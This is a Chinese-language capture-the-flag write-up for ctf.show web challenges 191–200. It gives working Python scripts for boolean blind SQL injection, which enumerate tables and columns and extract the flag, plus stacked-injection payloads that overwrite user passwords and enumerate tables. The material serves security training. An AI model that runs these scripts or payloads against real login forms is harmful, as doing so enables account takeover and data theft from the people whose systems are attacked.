web191
多了一个正则绕过
上脚本布尔盲注
用ord
#author:yu22x
import requests
import string
url="http://70adf0cb-2208-4974-b064-50a4f4103541.challenge.ctf.show/api/index.php"
s=string.ascii_letters+string.digits
flag=''
for i in range(1,45):
print(i)
for j in range(32,128):
#跑库名
# data={
# 'username':f"'||if(ascii(substr(database(),{i},1))={j},1,0)#",
# 'password':'1'
# }
#跑表名
# data={
# 'username':f"'||if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))={j},1,0)#",
# 'password':'1'
# }
#跑列名
# data={
# 'username':f"'||if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))={j},1,0)#",
# 'password':'1'
# }
#跑数据
data={
'username':f"'||if(ord(substr((select f1ag from ctfshow_fl0g),{i},1))={j},1,0)#",
'password':'1'
}
r=requests.post(url,data=data)
if("\\u5bc6\\u7801\\u9519\\u8bef" in r.text):
flag+=chr(j)
print(flag)
break
web192
直接不用ord了,改成跑字符。
#author:yu22x
import requests
import string
url="http://960c0983-53e2-470d-8482-88d1edee6500.challenge.ctf.show/api/index.php"
s=string.ascii_letters+string.digits
flag=''
for i in range(1,45):
print(i)
for j in range(32,128):
#跑表名
# data={
# 'username':f"'||if((substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))='{chr(j)}',1,0)#",
# 'password':'1'
# }
#跑列名
# data={
# 'username':f"'||if((substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))='{chr(j)}',1,0)#",
# 'password':'1'
# }
#跑数据
data={
'username':f"'||if((substr((select f1ag from ctfshow_fl0g),{i},1))='{chr(j)}',1,0)#",
'password':'1'
}
r=requests.post(url,data=data)
if("\\u5bc6\\u7801\\u9519\\u8bef" in r.text):
flag+=chr(j)
print(flag)
break
但是这个东西太慢了找了一个稍微快一点的
#@Auth:Sentiment
import requests
url='http://960c0983-53e2-470d-8482-88d1edee6500.challenge.ctf.show/api/index.php'
flag=''
for i in range(1,100):
m=32
n=127
while 1:
mid=(m+n)//2
data={
#'username':"admin' and (substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<'{}'#".format(i,chr(mid)),#ctfshow_fl0g,ctfshow_user
#'username':"admin' and (substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<'{}'#".format(i, chr(mid)), # id,f1ag
'username':"admin' and (substr((select f1ag from ctfshow_fl0g),{},1))<'{}'#".format(i, chr(mid)), # ctfshow{7b03d3e9-190a-43f2-9b13-008c7d2ce6f7}
'password':0
}
#print(data)
r=requests.post(url=url,data=data)
if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
n=mid
else:
m=mid
if (m + 1 == n):
flag += chr(m)
print(flag.lower())
break
web193
#@Auth:Sentiment
import requests
url='http://617039c3-6190-4487-ab63-7d139273ad98.challenge.ctf.show/api/index.php'
flag=''
for i in range(100):
for j in 'abcdefghijklmnopqrstuvwxyz0123456789-_,{}':
data={
#'username':"admin' and (select group_concat(table_name) from information_schema.tables where table_schema=database())like'{}'#".format(flag+j+'%'),#ctfshow_flxg
#'username':"admin' and (select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg')like'{}'#".format(flag+j+'%'), # id,f1ag
'username':"admin' and (select f1ag from ctfshow_flxg)like'{}'#".format(flag+j+'%'), # ctfshow{7b03d3e9-190a-43f2-9b13-008c7d2ce6f7}
'password':0
}
r=requests.post(url=url,data=data)
if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
flag+=j
print(flag)
break
web194
上一个脚本继续用
web195
堆叠注入
目标存在sql注入漏洞
目标未对";"号进行过滤
目标中间层查询数据库信息时可同时执行多条sql语句
username填写0是显示密码错误就说明可以在这里进行堆叠,用命令把密码设置一下
0;update`ctfshow_user`set`pass`=1
1
或者
下面这两句话都是在username进行的,密码随便填写
0;update(ctfshow_user)set`username`=1;(必须是0,不然的话没有回显显示用户名错误)
1;update(ctfshow_user)set`pass`=1;
然后username=1&password=1登录就行
web196
过滤了select但是联合注入是可以绕过的
成功的原因就是进行注入的时候0返回null,然后select(常数)就会把常数放在row里面
username=0;select(1);
password=1
web197
$sql = "select pass from ctfshow_user where username = {$username};";
已知这个表叫做ctfshow_user
username=0;show tables;
password=ctfshow_user
web 198–web200
与上题同